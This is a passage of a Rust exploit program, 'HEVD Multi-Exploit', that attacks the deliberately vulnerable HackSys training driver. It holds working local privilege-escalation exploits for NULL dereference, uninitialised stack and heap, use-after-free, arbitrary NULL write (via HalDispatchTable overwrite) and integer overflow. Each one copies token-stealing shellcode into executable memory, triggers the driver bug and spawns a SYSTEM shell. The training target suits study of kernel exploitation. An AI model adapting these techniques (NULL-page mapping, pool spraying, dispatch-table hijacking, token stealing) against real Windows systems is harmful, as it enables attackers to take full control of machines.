667 | let mut size : usize = 0x1000;
668 | unsafe {
669 | null_page = NtAllocateVirtualMemory(0xffff_ffff as HANDLE, &mut addr as PSIZE_T, 0, &mut size as PSIZE_T, 0x3000, 0x40);
670 | }
671 |
672 | null_page
673 | }
674 |
675 | #[cfg(windows)]
676 | fn exploit_null_deref_token (cmd : &str) {
677 | use kernel32::{CloseHandle, VirtualAlloc, DeviceIoControl};
678 | use winapi::um::winnt::RtlMoveMemory;
679 |
680 | let payload_end : Vec = vec![
681 | 0x31, 0xc0, // xor eax, eax
682 | 0xc3, // ret
683 | ];
684 | let payload = get_payload_token_stealing(&payload_end);
685 | let mut n_read : u32 = 0;
686 |
687 | let len_payload = payload.len();
688 |
689 | println! ("\n== NULL Dereference Exploitation\n");
690 |
691 | unsafe {
692 | println! ("[+] Allocating shellcode space");
693 | let addr_shellcode = VirtualAlloc(ptr::null_mut(), len_payload as u32, 0x3000, 0x40);
694 | println! ("[+] Copying shellcode to address : 0x{:x}", addr_shellcode as u64);
695 | RtlMoveMemory(addr_shellcode as *mut winapi::ctypes::c_void, payload.as_ptr() as *const winapi::ctypes::c_void, len_payload);
696 |
697 | println! ("[+] Prepare NULL Page");
698 | let null_page = alloc_null_page();
699 | if null_page != 0 {
700 | panic! ("[-] Couldn't allocate NULL page");
701 | }
702 |
703 | println! ("-> Inserting custom callback");
704 |
705 | // the callback we wanna setup
706 | let mut callback : Vec = Vec::with_capacity(16);
707 | callback.write_u32::(addr_shellcode as u32).unwrap();
708 |
709 | // insert our callback
710 | // offset 0x74 is our OkayToCloseProcedure callback
711 | // it gets call when CloseHandle() is called
712 | RtlMoveMemory(0x4 as *mut winapi::ctypes::c_void, callback.as_ptr() as *const winapi::ctypes::c_void, callback.len());
713 |
714 | println! ("[+] Opening device");
715 | let hev_device = open_device();
716 |
717 | println! ("[+] Trigger null deref");
718 | println! ("-> Prepare user value");
719 |
720 | let mut user_value : Vec = Vec::with_capacity(16);
721 | user_value.write_u32::(0x1337babe as u32).unwrap();
722 | DeviceIoControl(hev_device, 0x22202b, user_value.as_ptr() as *mut std::os::raw::c_void, 0, ptr::null_mut(), 0, &mut n_read, ptr::null_mut());
723 |
724 | CloseHandle(hev_device);
725 | }
726 |
727 | if check_system() {
728 | println! ("[+] NT_AUTHORITY\\SYSTEM shell incoming");
729 | let mut child = Command::new(cmd).spawn().expect("Failed to execute command");
730 | let _ecode = child.wait()
731 | .expect("failed to wait on child");
732 | }
733 | else {
734 | println! ("[-] Failed getting SYSTEM");
735 | }
736 | }
737 |
738 | #[cfg(windows)]
739 | fn exploit_non_init_stack (cmd : &str) {
740 | use kernel32::{CloseHandle, VirtualAlloc, DeviceIoControl};
741 | use winapi::um::winnt::RtlMoveMemory;
742 |
743 | let payload_end : Vec = vec![
744 | 0x31, 0xc0, // xor eax, eax
745 | 0xc3, // ret
746 | ];
747 | let payload = get_payload_token_stealing(&payload_end);
748 | let mut n_read : u32 = 0;
749 |
750 | let len_payload = payload.len();
751 |
752 | println! ("\n== Non Initialized Stack Variable Exploitation\n");
753 |
754 | unsafe {
755 | println! ("[+] Allocating shellcode space");
756 | let addr_shellcode = VirtualAlloc(ptr::null_mut(), len_payload as u32, 0x3000, 0x40);
757 | println! ("[+] Copying shellcode to address : 0x{:x}", addr_shellcode as u64);
758 | RtlMoveMemory(addr_shellcode as *mut winapi::ctypes::c_void, payload.as_ptr() as *const winapi::ctypes::c_void, len_payload);
759 |
760 | println! ("[+] Opening device");
761 | let hev_device = open_device();
762 |
763 | println! ("[+] Prepare user value");
764 |
765 | let mut user_value : Vec = Vec::with_capacity(16);
766 | user_value.write_u32::(0xcafebabe as u32).unwrap();
767 |
768 | println! ("[+] Preparing non init stack");
769 | println! ("-> Building UserPfnArray");
770 | let n_pages = 1024;
771 | let mut user_pfn_array : Vec = Vec::with_capacity(n_pages * 4);
772 |
773 | for _idx in 0..n_pages {
774 | user_pfn_array.write_u32::(addr_shellcode as u32).unwrap();
775 | }
776 |
777 | println! ("-> Array at 0x{:x} ({} bytes)", user_pfn_array.as_ptr() as usize, user_pfn_array.len());
778 |
779 | println! ("-> Inserting our array on the kernel stack and then triggering the vuln");
780 |
781 | // call it just before the DeviceIoControl() so no intermediary userland calls can junk it
782 | NtMapUserPhysicalPages(ptr::null_mut(), n_pages, user_pfn_array.as_ptr() as PULONG_PTR);
783 |
784 | DeviceIoControl(hev_device, 0x22202f, user_value.as_ptr() as *mut std::os::raw::c_void, user_value.len() as u32, ptr::null_mut(), 0, &mut n_read, ptr::null_mut());
785 |
786 | CloseHandle(hev_device);
787 | }
788 |
789 | if check_system() {
790 | println! ("[+] NT_AUTHORITY\\SYSTEM shell incoming");
791 | let mut child = Command::new(cmd).spawn().expect("Failed to execute command");
792 | let _ecode = child.wait()
793 | .expect("failed to wait on child");
794 | }
795 | else {
796 | println! ("[-] Failed getting SYSTEM");
797 | }
798 | }
799 |
800 | #[cfg(windows)]
801 | fn pool_spray_lookaside4 (n_handles : usize, value : u32) -> Vec {
802 | use kernel32::{ CreateEventA, CreateEventW };
803 | let mut handles = Vec::with_capacity(n_handles);
804 |
805 | for idx_handle in 0..n_handles {
806 | // prepare chunk
807 | let mut chunk : Vec = Vec::with_capacity(256);
808 | let n_values = (0xf0 - 4) / 4;
809 |
810 | for _idx_value in 0..n_values {
811 | chunk.write_u32::(value).unwrap();
812 | }
813 | chunk.write_u32::(idx_handle as u32 + 0x30303030).unwrap();
814 |
815 | // spray
816 | let handle;
817 | unsafe {
818 | // In ASCII, it will fail
819 | //handle = CreateEventA(ptr::null_mut(), 1, 0, chunk.as_ptr() as *mut i8);
820 | handle = CreateEventW(ptr::null_mut(), 1, 0, chunk.as_ptr() as *mut u16);
821 | }
822 | handles.push(handle);
823 | }
824 |
825 | handles
826 | }
827 |
828 | #[cfg(windows)]
829 | fn exploit_non_init_heap (cmd : &str) {
830 | use kernel32::{CloseHandle, VirtualAlloc, DeviceIoControl};
831 | use winapi::um::winnt::RtlMoveMemory;
832 |
833 | let payload_end : Vec = vec![
834 | 0x31, 0xc0, // xor eax, eax
835 | 0xc3, // ret
836 | ];
837 | let payload = get_payload_token_stealing(&payload_end);
838 | let mut n_read : u32 = 0;
839 |
840 | let len_payload = payload.len();
841 |
842 | println! ("\n== Non Initialized Heap Variable Exploitation\n");
843 |
844 | unsafe {
845 | println! ("[+] Allocating shellcode space");
846 | let addr_shellcode = VirtualAlloc(0x13370000 as *mut std::os::raw::c_void, 0x10000 as u32, 0x3000, 0x40);
847 | let addr_landing = addr_shellcode as u32 + 0x1234;
848 |
849 | println! ("[+] Copying nopsled to address : 0x{:x}", addr_shellcode as u64);
850 | ptr::write_bytes(addr_shellcode as *mut u8, 0x90, 0x10000);
851 | println! ("[+] Copying shellcode to address : 0x{:x}", addr_landing as u64);
852 | RtlMoveMemory(addr_landing as *mut winapi::ctypes::c_void, payload.as_ptr() as *const winapi::ctypes::c_void, len_payload);
853 |
854 | println! ("[+] Opening device");
855 | let hev_device = open_device();
856 |
857 | println! ("[+] Prepare user value");
858 |
859 | let mut user_value : Vec = Vec::with_capacity(16);
860 | user_value.write_u32::(0xbad31337 as u32).unwrap();
861 |
862 | // we need to launch threads so we can poison each lookaside lists
863 | // XXX: Use SetThreadAffinityMask()
864 | println! ("[+] Heap Spraying Event objects");
865 | println! ("We'll be spraying 0x{:x} in the look-aside lists", addr_landing);
866 | let n_threads = 128;
867 | let mut threads = Vec::with_capacity(n_threads);
868 | for _idx in 0..n_threads {
869 | let cur_thread = thread::spawn( move || {
870 | let handles = pool_spray_lookaside4(256, addr_landing);
871 | //println! ("[+] Free handles");
872 | free_handles(&handles);
873 | });
874 |
875 | threads.push(cur_thread);
876 | }
877 |
878 | // threads need to join so we're "sure" that the threads poisoned their lookaside lists
879 | for cur_thread in threads {
880 | cur_thread.join();
881 | }
882 |
883 | println! ("-> Triggering the vuln");
884 |
885 | DeviceIoControl(hev_device, 0x222033, user_value.as_ptr() as *mut std::os::raw::c_void, user_value.len() as u32, ptr::null_mut(), 0, &mut n_read, ptr::null_mut());
886 |
887 | CloseHandle(hev_device);
888 | }
889 |
890 | if check_system() {
891 | println! ("[+] NT_AUTHORITY\\SYSTEM shell incoming");
892 | let mut child = Command::new(cmd).spawn().expect("Failed to execute command");
893 | let _ecode = child.wait()
894 | .expect("failed to wait on child");
895 | }
896 | else {
897 | println! ("[-] Failed getting SYSTEM");
898 | }
899 | }
900 |
901 | #[cfg(windows)]
902 | fn exploit_uaf (cmd : &str) {
903 | use kernel32::{CloseHandle, VirtualAlloc, DeviceIoControl};
904 | use winapi::um::winnt::RtlMoveMemory;
905 |
906 | let payload_end : Vec = vec![
907 | 0x31, 0xc0, // xor eax, eax
908 | 0xc3, // ret
909 | ];
910 | let payload = get_payload_token_stealing(&payload_end);
911 | let mut n_read : u32 = 0;
912 |
913 | let len_payload = payload.len();
914 |
915 | println! ("\n== Use-after-Free Exploitation\n");
916 |
917 | unsafe {
918 | println! ("[+] Allocating shellcode space");
919 | let addr_shellcode = VirtualAlloc(0x13370000 as *mut std::os::raw::c_void, 0x10000 as u32, 0x3000, 0x40);
920 | let addr_landing = addr_shellcode as u32 + 0x1234;
921 |
922 | println! ("[+] Copying nopsled to address : 0x{:x}", addr_shellcode as u64);
923 | ptr::write_bytes(addr_shellcode as *mut u8, 0x90, 0x10000);
924 | println! ("[+] Copying shellcode to address : 0x{:x}", addr_landing as u64);
925 | RtlMoveMemory(addr_landing as *mut winapi::ctypes::c_void, payload.as_ptr() as *const winapi::ctypes::c_void, len_payload);
926 |
927 | println! ("[+] Opening device");
928 | let hev_device = open_device();
929 |
930 | println! ("[+] Prepare user object");
931 |
932 | let mut user_obj : Vec = Vec::with_capacity(0x58);
933 | let n_vals = 0x58 / 4;
934 | for _idx in 0..n_vals {
935 | user_obj.write_u32::(addr_landing as u32).unwrap();
936 | }
937 |
938 | // HACKSYS_EVD_IOCTL_ALLOCATE_UAF_OBJECT
939 | println! ("[+] Allocate UAF Object");
940 | DeviceIoControl(hev_device, 0x222013, ptr::null_mut(), 0, ptr::null_mut(), 0, &mut n_read, ptr::null_mut());
941 |
942 | // HACKSYS_EVD_IOCTL_FREE_UAF_OBJECT
943 | println! ("[+] Free UAF Object");
944 | DeviceIoControl(hev_device, 0x22201b, ptr::null_mut(), 0, ptr::null_mut(), 0, &mut n_read, ptr::null_mut());
945 |
946 | // HACKSYS_EVD_IOCTL_ALLOCATE_FAKE_OBJECT
947 | println! ("[+] Allocate fake UAF Object");
948 | DeviceIoControl(hev_device, 0x22201f, user_obj.as_ptr() as *mut std::os::raw::c_void, user_obj.len() as u32, ptr::null_mut(), 0, &mut n_read, ptr::null_mut());
949 |
950 | // HACKSYS_EVD_IOCTL_USE_UAF_OBJECT
951 | println! ("[+] Triggering the vuln");
952 | DeviceIoControl(hev_device, 0x222017, ptr::null_mut(), 0, ptr::null_mut(), 0, &mut n_read, ptr::null_mut());
953 |
954 | CloseHandle(hev_device);
955 | }
956 |
957 | if check_system() {
958 | println! ("[+] NT_AUTHORITY\\SYSTEM shell incoming");
959 | let mut child = Command::new(cmd).spawn().expect("Failed to execute command");
960 | let _ecode = child.wait()
961 | .expect("failed to wait on child");
962 | }
963 | else {
964 | println! ("[-] Failed getting SYSTEM");
965 | }
966 | }
967 |
968 | #[cfg(windows)]
969 | fn write_null_at (addr : u32) -> bool {
970 | use kernel32::{ CloseHandle, DeviceIoControl };
971 |
972 | let mut www : Vec = Vec::with_capacity(16);
973 | let mut n_read : u32 = 0;
974 |
975 | www.write_u32::(addr).unwrap();
976 |
977 | let hev_device = open_device();
978 |
979 | println! ("-> Writing NULL to 0x{:x}", addr);
980 | unsafe {
981 | let rc = DeviceIoControl(hev_device,
982 | 0x222047,
983 | www.as_ptr() as *mut std::os::raw::c_void,
984 | www.len() as u32,
985 | ptr::null_mut(),
986 | 0,
987 | &mut n_read,
988 | ptr::null_mut());
989 |
990 | CloseHandle(hev_device);
991 |
992 | if rc != 0 {
993 | return true;
994 | }
995 | }
996 |
997 | return false;
998 | }
999 |
1000 | #[cfg(windows)]
1001 | fn exploit_arbitrary_null (cmd : &str) {
1002 | use std::ffi::CString;
1003 | use kernel32::{ GetProcAddress };
1004 | use kernel32::{ VirtualProtect, LoadLibraryExA };
1005 | use winapi::um::winnt::RtlMoveMemory;
1006 |
1007 | let payload_end : Vec = vec![
1008 | 0x31, 0xc0, // xor eax, eax
1009 | 0x83, 0xc4, 0x24, // add esp, byte +0x24
1010 | 0x5d, // pop ebp
1011 | 0xc2, 0x08, 0x00, // ret 0x8
1012 | ];
1013 | let payload = get_payload_token_stealing(&payload_end);
1014 |
1015 | let len_payload = payload.len();
1016 |
1017 | println! ("\n== Arbitrary NULL Exploitation\n");
1018 |
1019 | println! ("[+] Looking for Windows kernel base");
1020 | let mod_ntkrnl = match lookup_base("ntkrnl") {
1021 | Some (v) => v,
1022 | None => panic! ("Failed resolving ntkrnl base"),
1023 | };
1024 | let (name_ntkrnl, base_ntkrnl) = mod_ntkrnl;
1025 | println! ("-> kernel base : 0x{:x}", base_ntkrnl);
1026 | println! ("name : {} addr : 0x{:x}", name_ntkrnl, base_ntkrnl);
1027 |
1028 | let mod_hal = match lookup_base("hal") {
1029 | Some (v) => v,
1030 | None => panic! ("Failed resolving hal base"),
1031 | };
1032 | let (name_hal, base_hal) = mod_hal;
1033 | println! ("-> HAL base : 0x{:x}", base_hal);
1034 | println! ("name : {} addr : 0x{:x}", name_hal, base_hal);
1035 |
1036 | let addr_ntkrnl;
1037 | let mut addr_hal_dispatch;
1038 | unsafe {
1039 | println! ("[+] Getting HalDispatchTable offset in ntkrnl");
1040 | addr_ntkrnl = LoadLibraryExA(name_ntkrnl.as_ptr() as *const i8, ptr::null_mut(), 1);
1041 | if addr_ntkrnl == ptr::null_mut() {
1042 | panic! ("Unable to load ntkrnl");
1043 | }
1044 | println! ("-> ntkrnl base : 0x{:x}", addr_ntkrnl as u32);
1045 |
1046 | let symbol_name = CString::new("HalDispatchTable").unwrap();
1047 | addr_hal_dispatch = GetProcAddress(addr_ntkrnl,
1048 | symbol_name.as_ptr() as *const i8);
1049 | if addr_hal_dispatch == ptr::null_mut() {
1050 | panic! ("Unable to load HAL");
1051 | }
1052 | let off_hal = addr_hal_dispatch as usize - addr_ntkrnl as usize;
1053 | println! ("-> HalDispatchTable uaddr : 0x{:x}", addr_hal_dispatch as u32);
1054 | println! ("-> HalDispatchTable offset : 0x{:x}", off_hal);
1055 |
1056 | println! ("[+] Getting HalDispatchTable kernel address");
1057 | addr_hal_dispatch = (base_ntkrnl + off_hal) as *mut std::os::raw::c_void;
1058 | println! ("-> HalDispatchTable addr : 0x{:x}", addr_hal_dispatch as usize);
1059 | println! ("-> HalDispatchTable+4 addr : 0x{:x}", addr_hal_dispatch as usize + 4);
1060 |
1061 | println! ("[+] Resolving HaliQuerySystemInformation");
1062 | println! ("-> Loading {}", name_hal);
1063 | let addr_hal = LoadLibraryExA(name_hal.as_ptr() as *const i8, ptr::null_mut(), 1);
1064 | if addr_hal == ptr::null_mut() {
1065 | panic! ("Unable to load HAL");
1066 | }
1067 |
1068 | println! ("[+] Allocating shellcode space");
1069 |
1070 | println! ("[+] Prepare NULL Page");
1071 | let null_page = alloc_null_page();
1072 | if null_page != 0 {
1073 | panic! ("[-] Couldn't allocate NULL page");
1074 | }
1075 |
1076 | println! ("[+] Set NULL Page to RWX");
1077 | let mut oldProtect = 0;
1078 | VirtualProtect(ptr::null_mut(), 0x1000, 0x40, &mut oldProtect);
1079 |
1080 | let addr_shellcode = null_page;
1081 |
1082 | println! ("[+] Copying shellcode to address : 0x{:x}", addr_shellcode as u64);
1083 | RtlMoveMemory(addr_shellcode as *mut winapi::ctypes::c_void, payload.as_ptr() as *const winapi::ctypes::c_void, len_payload);
1084 |
1085 | println! ("[+] Patching HalDispatchTable+4 with NULL");
1086 | if write_null_at(addr_hal_dispatch as u32 + 4) == false {
1087 | println! ("[-] Arbitrary NULL IOCTL is not implemented");
1088 | process::exit (1);
1089 | }
1090 |
1091 | raw_input("Before trigger");
1092 |
1093 | println! ("[+] Trigger privesc");
1094 | let mut interval : Vec = Vec::with_capacity(16);
1095 | interval.write_u32::(0).unwrap();
1096 | NtQueryIntervalProfile(0x1337 as PVOID, interval.as_ptr() as ULONG_PTR);
1097 |
1098 | // XXX: dynamically resolve HaliQuerySystemInformation,
1099 | println! ("[+] Restoring HalDispatchTable+4 with original value : 0x{:x}", base_hal as u32 + 0x278a2);
1100 | write4_at(addr_hal_dispatch as u32 + 4, base_hal as u32 + 0x278a2);
1101 | }
1102 |
1103 | if check_system() {
1104 | println! ("[+] NT_AUTHORITY\\SYSTEM shell incoming");
1105 | let mut child = Command::new(cmd).spawn().expect("Failed to execute command");
1106 | let _ecode = child.wait()
1107 | .expect("failed to wait on child");
1108 | }
1109 | else {
1110 | println! ("[-] Failed getting SYSTEM");
1111 | }
1112 | }
1113 |
1114 | #[cfg(windows)]
1115 | fn exploit_integer_overflow (cmd : &str) {
1116 | use kernel32::{CloseHandle, VirtualAlloc, DeviceIoControl};
1117 | use winapi::um::winnt::RtlMoveMemory;
1118 |
1119 | let payload_end : Vec = vec![
1120 | 0x31, 0xc0, // xor eax, eax
1121 | 0x5d, // pop ebp
1122 | 0xc2, 0x08, 0x00, // ret 0x8
1123 | ];
1124 | let payload = get_payload_token_stealing(&payload_end);
1125 | let mut n_read : u32 = 0;
1126 |
1127 | let len_payload = payload.len();
1128 |
1129 | println! ("\n== Integer Overflow Exploitation\n");
1130 |
1131 | unsafe {
1132 | println! ("[+] Allocating shellcode space");
1133 | let ptr = VirtualAlloc(ptr::null_mut(), len_payload as u32, 0x3000, 0x40);
1134 | println! ("[+] Copying shellcode");
1135 | RtlMoveMemory(ptr as *mut winapi::ctypes::c_void, payload.as_ptr() as *const winapi::ctypes::c_void, len_payload);
1136 |
1137 | println! ("[+] Preparing attack payload");
1138 | let n_len = 2092;
1139 | let mut buf : Vec = Vec::with_capacity(n_len);
1140 | let n_iter = n_len / 4;
1141 |
1142 | for _idx_iter in 0..n_iter {
1143 | buf.write_u32::(ptr as u32).unwrap();
1144 | }
1145 |
1146 | // terminator
1147 | buf.write_u32::(0xbad0b0b0).unwrap();
1148 |
1149 | println! ("[+] Opening device");
1150 | let hev_device = open_device();
1151 |
1152 | println! ("[+] Triggering vuln");
1153 | DeviceIoControl(hev_device, 0x222027, buf.as_ptr() as *mut std::os::raw::c_void, 0xFFFFFFFC, ptr::null_mut(), 0, &mut n_read, ptr::null_mut());
1154 |
1155 | CloseHandle(hev_device);
1156 | }
1157 |
1158 | if check_system() {
1159 | println! ("[+] NT_AUTHORITY\\SYSTEM shell incoming");
1160 | let mut child = Command::new(cmd).spawn().expect("Failed to execute command");
1161 | let _ecode = child.wait()
1162 | .expect("failed to wait on child");
1163 | }
1164 | else {
1165 | println! ("[-] Failed getting SYSTEM");
1166 | }
1167 | }
1168 |
1169 | fn raw_input (msg : &str) -> String {
1170 | let mut user_buf = String::new();
1171 |
1172 | print! ("{}", msg);
1173 | let _ = stdout().flush();
1174 |
1175 | stdin().read_line(&mut user_buf).expect("Did not enter a correct string");
1176 | if let Some('\n') = user_buf.chars().next_back() {
1177 | user_buf.pop();
1178 | }
1179 | if let Some('\r') = user_buf.chars().next_back() {
1180 | user_buf.pop();
1181 | }
1182 |
1183 | user_buf
1184 | }
1185 |
1186 | fn main() {
1187 | println! ("HEVD Multi-Exploit v0.1 by m_101\n");
1188 | println! ("== TOKEN STEALING SHELLCODE");
1189 | println! ("1 - Stack Overflow");
1190 | println! ("2 - Arbitrary Over-write");
1191 | println! ("3 - Non-Paged Pool Overflow");
1192 | println! ("4 - NULL Dereference");
1193 | println! ("5 - Non initialized stack");
1194 | println! ("6 - Non initialized heap");
1195 | println! ("7 - Use-after-Free");
1196 | println! ("8 - Double Fetch");
1197 | println! ("9 - Arbitrary NULL write");
1198 | println! ("10 - Integer Overflow\n");
1199 |
1200 | let user_buf = raw_input("Please enter a choice : ");
1201 | let choice : u32 = match user_buf.parse() {
1202 | Ok (v) => v,
1203 | Err (_e) => 0x1337,
1204 | };
1205 |
1206 | match choice {
1207 | 1 => exploit_bof_token("cmd.exe"),
1208 | 2 => exploit_arbitrary_write("cmd.exe"),
1209 | 3 => exploit_nonpaged_pool_overflow_token("cmd.exe"),
1210 | 4 => exploit_null_deref_token("cmd.exe"),
1211 | 5 => exploit_non_init_stack("cmd.exe"),
1212 | 6 => exploit_non_init_heap("cmd.exe"),
1213 | 7 => exploit_uaf("cmd.exe"),
1214 | 8 => exploit_double_fetch("cmd.exe"),
1215 | 9 => exploit_arbitrary_null("cmd.exe"),
1216 | 10 => exploit_integer_overflow("cmd.exe"),
1217 | _ => println! ("Not doing anything "),
1218 | }
1219 | }
1220 |
1221 |
--------------------------------------------------------------------------------